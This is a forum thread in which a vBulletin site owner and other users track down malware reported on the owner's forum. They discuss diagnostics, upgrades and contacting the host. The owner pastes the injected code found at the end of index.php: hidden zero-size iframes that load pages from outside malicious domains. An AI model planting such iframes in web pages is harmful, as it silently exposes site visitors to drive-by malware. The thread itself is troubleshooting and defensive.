Malware ... but where?!.. AHHHH!
 

I think the title shows all. My forum, http://www.adminfuel.com, gives the error that some sort of malware is present. However, I cannot find anything to do with this. Are there certain areas I should check?

Thanks

Let me install my AV and i'll tell you. Lol

Haha.. thanks :)

No problem, but one thing I'd suggest, check your index.php and global.php files. If there's something there at the top besides /*=========*\||vbstuff||etc.. then delete it.

Thanks, I had a look, and there was nothing there BUT I had a look at the end of the index.php file and I found an iframe after the PHP tag closes:

<iframe src="http://google-stat.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><iframe src="http://odmarco.com/arwe/?736361acd09ca9717c9462514beb5205" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

I have removed this, that the right thing?

That wouldn't do anything anyways. print_output() on that last eval() code disables any further code to be printed.

First of all, I'd suggest you upgrade to at least 3.8.3.

I do not see any suspicious code besides that one in the source, but in Firefox, your style is broken due to the "Reported Attack Site" window. I had to switch to IE8 for viewing your site.
Even in IE8, it doesn't show up. I also used w3 validator.

Been on holiday so couldn't update. Doing now, bit annoying with the error, but I am submitting to Google to recheck.

rockinaway, at this point I'd have to suggest this:

For security reasons, I'd contact your hosting provider. (Which, according to Google, is Dreamhost?) You should contact them and request that they do a security audit on the server you're located on.

You should change your passwords to something more secure. (eg: cv%3m2Fwe!@#.RE - but note that you'll need to remember the password [clearly, lol])

You should run the vBulletin "Suspect File Versions" script via the administrator control panel.
To do this, go to:
Admin CP > Maintenance > Diagnostics > Suspect File Version

Once that has been completed, if you could screenshot the page (or in firefox, use Screengrab and save/upload the entire frame) I'd try and tell you what to look for.

I am on 3.8.1 now, if I want to update to the latest 3.8.4, which security patch would I download? I can't figure it out, haha... forgotten everything.

Before, I noticed a strange address appear when page loads, but now I don't see that. I wiill still contact my hosting provider.

Just download vBulletin as if you were downloading a new install. vBulletin Members Area - across from the same license for the board you're attempting to upgrade is a "Download vBulletin" and "Download ImpEx" link. The vB one is the one you want to click :p

Even so, contacting your host and making sure there were no exploited services, up-to-date software, etc is all running fine, then it could be determined to a XSS flaw of some sort, or php script that is on the server.